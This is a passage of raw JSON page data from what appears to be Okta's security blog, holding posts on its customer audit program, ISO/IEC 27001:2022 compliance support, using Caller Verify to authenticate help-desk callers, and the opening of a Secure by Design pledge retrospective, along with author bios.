</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png"},"name":" Aimi Mcilwraith","jobTitle":"Senior Security Analyst","slug":"/hackers/aimi-mcilwraith","node_locale":"en"}]},{"slug":"/articles/2025/05/enhancing-customer-trust-through-a-comprehensive-audit-program","id":"254b847f-f0eb-554a-b8d4-6958644d5e74","title":"Enhancing Customer Trust Through a Comprehensive Audit Program","date":"2025-05-14T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This is the third iteration in our blog series. In our \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2024/09/unveiling-essence-security-customer-trust/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"first blog\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", we introduced Okta’s Security Customer Trust team, highlighting our commitment to transparency and our mission to strengthen security outcomes for Okta and the communities we serve. 
In the \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/03/empowering-security-with-customer-trust-solutions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"second blog\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", we took a closer look at the tools and solutions that power our Customer Trust efforts.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this blog, we’ll explore how the Okta Security Customer Audit further enhances the Customer Trust function, driving even greater transparency and confidence in our security practices to meet our customers' regulatory and compliance requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The many benefits of Cloud computing come with the challenge of having reduced visibility into the day-to-day operations of the growing number of applications in today’s tech stacks. Identity has become the cornerstone of a security program and the new perimeter of technology itself.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For most customers, reviewing Okta’s generally available documentation meets their requirements. For highly regulated customers, a more detailed audit and more robust documentation may be necessary.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Introducing the program\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As organizations increasingly rely on identity platforms, the need for comprehensive security measures has never been greater. 
The growing dependence on external vendors, suppliers, and service providers means businesses face a diverse set of supply chain risks that must be carefully managed to maintain a strong security posture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Security Customer Audit program enables highly regulated customers to view the policies, procedures, and evidence that Okta provides to its auditors and meet regulatory requirements for observing control implementation evidence. Our program is carefully designed to enable audits to occur in a way that ensures equality and that does not expose customers to undue risk.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Working with us\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Through structured assessments, our program provides deep visibility into Okta’s enterprise operations, covering critical areas such as quality control, regulatory compliance, security measures, and performance metrics. These audits are designed to give customers the confidence that Okta’s security practices not only meet, but often exceed, industry standards, empowering them to meet their own regulatory and compliance requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During an Okta Security Customer Audit, you can expect:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Before an Audit\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our team will execute a thorough review of the Okta processes, documentation, and controls. 
This may include interviews with key personnel, examination of various records, and observation of operational practices. Our audit team possesses expertise in relevant areas such as quality assurance, compliance, and information security across various industries and regions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During an Audit, Pooled edition\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Following the methodical mapping of regulatory controls, we extended our program's capabilities to a pooled audit function. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Last December, we piloted our Okta Security Pooled Audit program \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"(more on this in a future blog)\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", which addressed the control requirements defined by the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/05/a-guide-to-dora-compliance-with-okta/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Digital Operational Resilience Act (DORA)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Our pooled audit resulted in equipping dozens of our EMEA/UK financial services customers with an open-door look into our security program, much like we would share with our own third-party audit functions. Ultimately, we demonstrated that Okta's controls meet customer and regulator requirements, in addition to fostering community. 
Our attendees had peer-to-peer opportunities to discuss similar industry-related challenges they face in their respective organizations regarding compliance regulations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"After the Audit\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Post-audit closing activities are crucial for the program's effectiveness. These activities involve following up on the implementation of corrective actions and verifying that Okta has made the necessary improvements to keep both Okta and our customers secure. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More on our Audit programs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While we’re not subject to every global regulation, we will work closely with our customers to understand their requirements, support them in their efforts to achieve and maintain compliance, and reinforce trust in Okta. \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Later this month, we’re expanding our pooled audit program to help Okta’s Australian customers address new regulations under the Australian Prudential Regulation Authority (APRA) CPS 230, and the existing CPS 234 requirements, which will follow the same program structure. 
To learn more about our audit programs and how to get involved, contact your account team.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"This is the third iteration in our blog series. This blog article explores how the Okta Security Customer Audit further enhances the Customer Trust function, driving even greater transparency and confidence in our security practices to meet our customers' regulatory and compliance requirements."},"updatedAt":"2025-06-19T20:56:29.667Z","secAuthor":[{"id":"0549c9bd-5615-52a0-8683-f6b734b931cc","bio":{"bio":"<p> Tushar Badlani is the Global Customer Audit Manager within the Security Trust and Culture team at Okta. He leads Okta’s global customer audit program, ensuring consistent, risk-aligned assurance engagements across all regions. He brings extensive experience in customer assurance, compliance, and cross-functional collaboration, shaped by his consulting background at EY and work across industries and in professional services. Originally from India, he earned his master’s degree from Syracuse University and is now based in San Francisco. Outside of work, he enjoys hiking, backpacking, and travelling to explore new places and cultures; he’s now been to 27 countries and 45 US States.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/61duT68OiTwHjxJS8gPPuy/f02be27b559de0ada96a7902d219f067/Tushar_HeadShot.jpg"},"name":"Tushar Badlani","jobTitle":"Global Customer Audit Manager","slug":"/hacker/tushar-badlani","node_locale":"en"},{"id":"06b9e469-2cb0-5dc7-a6c5-e46c9a367857","bio":{"bio":"<p> Matthew Hansen is a Regional CSO for Okta’s Americas West region. As a leader in security risk management, his accolades include MBA, CISA, and CCSK. Backed by over 15 years of experience in consulting, internal audit, IT governance and risk management, Matthew provides security program support to Okta’s customers. 
During his downtime, he enjoys travelling the world, experiencing new cultures, and attending Formula 1 races.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg"},"name":"Matthew Hansen","jobTitle":"Regional CSO, Americas West","slug":"/hackers/matthew-hansen","node_locale":"en"}]},{"slug":"/articles/2025/06/enabling-iso27001-compliance-with-okta","id":"4b12c067-3a67-5b26-977f-f9bb9a0a0611","title":"Enabling ISO/IEC 27001:2022 Compliance with Okta","date":"2025-06-04T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ISO/IEC 27001 continues to be a globally recognized security standard and a consistently popular choice for today’s organizations seeking to demonstrate robust security controls and the effectiveness of their Information Security Management Systems (ISMS). This blog introduces a new Factsheet that provides guidance on how Okta can support organizations of any size in achieving or maintaining compliance to the ISO/IEC 27001:2022 standard.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is ISO/IEC 27001:2022?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ISO/IEC 27001 is an international standard for information security management. It provides a framework for organizations to follow to establish, implement, monitor, and maintain an effective Information Security Management System (ISMS). 
The standard consists of security controls, which are divided into groups of:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Organizational, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"People,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Physical, and \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technological controls.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The 2022 iteration of the standard introduced “Operational Capabilities” such as Identity and Access Management (IAM). By implementing applicable IAM controls in an organization’s environment, it can be demonstrated that best practices are being followed for securing information, data, and assets.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Okta supports compliance with ISO/IEC 27001:2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Auth0 are ISO/IEC 27001:2022-compliant. Our platforms can also support organizations in achieving or maintaining their compliance with the ISO/IEC 27001:2022 standard. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To guide our customers on how Okta can support, we’ve recently released a helpful new resource: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/?itemUid=6217dabc-952b-4163-b19b-8372a8de7d4d&source=click\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"The ISO/IEC 27001:2022 Compliance with Okta Platform Factsheet\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". This Factsheet provides an overview of ISO27001’s benefits and a detailed summary of how Okta’s products provide a unified approach in compliance adherence to IAM-specific and other controls. Keeping our customers in mind, we’ve methodically documented our guidance in three key sections:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Okta Supports IAM Controls\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Okta Supports Non-IAM Specific Controls\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ISO/IEC 27001:2022 Reporting Requirements\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Each section is strategically mapped to Okta products that support adhering to the controls, as presented. 
Leveraging the control guidance of the Factsheet can benefit all Okta customers, even organizations not currently targeting adherence to these controls.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More on Compliance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta upholds a strong compliance framework to demonstrate our commitment to maintaining highly available, secure, and resilient products and services. Many of these controls are embedded in Okta’s business-as-usual activities. We invite you to visit our new Factsheet, as well as our latest independent audit reports and other security compliance-related documents on our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and all available documentation is accessible to customers and prospects of Okta. 
Site visitors can view Okta’s certifications and access industry-standard questionnaires. To learn more about our efforts, read our blog article, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/03/empowering-security-with-customer-trust-solutions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Empowering Security with Customer Trust Solutions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".  Keep watching as we publish additional helpful resources; more to come.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Disclaimer: While this article discusses certain legal concepts, it does not constitute legal advice. It is provided for informational purposes only. For legal advice regarding your organization's compliance needs, please consult your organization's legal department. Okta makes no representations, warranties, or other assurances regarding the content of this article. Information regarding Okta's contractual assurances to its customers can be found at \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://okta.com/agreements\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta.com/agreements\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"ISO/IEC 27001 is a globally recognized security standard. This blog introduces a new Factsheet that provides guidance on how Okta can support organizations of any size in achieving or maintaining compliance to the ISO/IEC 27001:2022 standard."},"updatedAt":"2025-06-19T20:55:40.460Z","secAuthor":[{"id":"5d49800b-59a6-5c33-b25f-79ad8ce4b228","bio":{"bio":"<p> Gemma Parkes is a Security Assurance Analyst in the EMEA region at Okta. 
The Customer Assurance team within Security Trust & Culture supports Okta’s growing customer base with inquiries pertaining to security and compliance. Working within the defence and aerospace industry, then moving to global corporations supporting public and private sector customers, Gemma has gained extensive experience in implementing and managing security frameworks and associated security practices. Backed by over 20 years of experience in security governance, risk management, and compliance, she now enjoys working collaboratively to provide strategic support to Okta’s customers and prospects. In her downtime, Gemma enjoys spending time with her family and going to the theatre.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg"},"name":"Gemma Parkes","jobTitle":"Security Assurance Analyst","slug":"/hackers/gemma-parkes","node_locale":"en"}]},{"slug":"/articles/2025/06/building-confidence-in-support-comms-with-caller-verify-at-okta","id":"3e590ecf-3c74-5381-9fad-40076025fca0","title":"Building Confidence in Support Comms with Caller Verify at Okta","date":"2025-06-18T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In many of the most impactful incidents of the past two years, attackers gained privileged access to systems by tricking IT support personnel into resetting the passwords and MFA factors of system administrators.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Armed with access to privileged accounts, attackers were able to expand their access further by accessing directories of hashed passwords (NTDS.dit) stored in every Microsoft Active Directory environment. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In most organizations, the challenge is how to validate the identity of callers to internal help desks or other technical teams before performing user lifecycle events. The days when the name of your childhood best friend or your first car model provided enough assurance to validate your identity are long gone.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"So, when an employee does call for help, how do technical support personnel validate with confidence that the caller on the line is who they say they are? These processes need to be revisited, especially given recent advances in “deepfake” technology.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"That’s where Caller Verify can help.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"What is Caller Verify?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.callerverify.com/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Caller Verify\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" is an application that enables IT support to extend the multi-factor authentication prompts available via Okta Verify to quickly and securely verify the identity of inbound callers. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Caller Verify is a third-party developed application awarded Okta’s \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/blog/2024/10/okta-partner-awards-celebrating-our-2024-partner-award-winners/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"\\\"2024 AMER Rising Star Partner of the Year” winner\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". It can integrate with ITSM and CRM solutions, such as ServiceNow or Salesforce, to require that all inbound callers satisfy an MFA challenge before a support ticket is unlocked for use.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Caller Verify is compliant with the following regulations:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.osfi-bsif.gc.ca/en/guidance/guidance-library/technology-cyber-risk-management\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Office of the Superintendent of Financial Institutions (OSFI) Guideline B-13 Technology and Cyber Risk Management\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", subsection 3.2.7 Defend\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.hhs.gov/hipaa/for-professionals/privacy/laws-regulations/index.html\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Health Insurance Portability and Accountability 
(HIPAA)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" Security Rule, 45 CFR § 164.308(a)(1)(ii)(D)\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.pcisecuritystandards.org/standards/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Payment Card Industry Data Security Standard (PCI DSS)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Requirement 7.1\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://gdpr-info.eu/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"General Data Protection Regulation (GDPR)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Article 32\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63-3.html\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"National Institute of Standards and Technology (NIST)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Level 3\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This solution allows Okta IT admins to enhance our employee experience with a timely response to confident, authenticated communications. 
By sending a prompt to the caller using Okta Verify, the technical support team can validate the caller’s identity before providing any level of assistance, protecting both the organization and the user.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta’s Use Case\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta integrated Caller Verify into various IT support processes well over 12 months ago. Our use of Caller Verify ensures that only authorized employees can ask IT support to perform sensitive operations that involve an Okta account.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In line with Okta’s \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/fr-fr/newsroom/press-releases/introducing-the-okta-secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"ongoing commitment \",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\"to hardening our corporate infrastructure, Okta requires that users satisfy all authentication challenges using phishing-resistant authentication methods (such as FastPass with an Okta Verify-enrolled device, or a registered Yubikey), including the challenges required to open a support request.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Stay secure\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Caller Verify plays an important role in Okta’s end-to-end ability to protect all enrollment, authentication and recovery flows with phishing-resistant authentication. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To learn about Okta’s use of ID Verification to secure enrollment and recovery, read on for \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/02/how-okta-embraces-identity-verification-using-persona/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"how we leverage Okta’s integration with Persona\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"The days when the name of your childhood best friend or your first car model provided enough assurance to validate your identity are long gone. That’s where Caller Verify can help."},"updatedAt":"2025-06-18T17:25:51.381Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"<p>Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. 
Carmen spends her downtime traveling, thrifting for treasures and reading.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"}]},{"slug":"/articles/2025/05/oktas-secure-by-design-pledge-one-year-on","id":"dbeedf3c-399d-530e-b334-01b80ddd7871","title":"Okta’s Secure by Design Pledge - One Year On","date":"2025-05-22T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Foreword  \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nA year ago, Okta was among the first technology providers to pledge our commitment to the US Cybersecurity and Infrastructure Security Agency (CISA)'s seven Secure by Design principles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To CISA’s great credit, the Secure by Design voluntary pledge program has created strong momentum across the cybersecurity industry. 
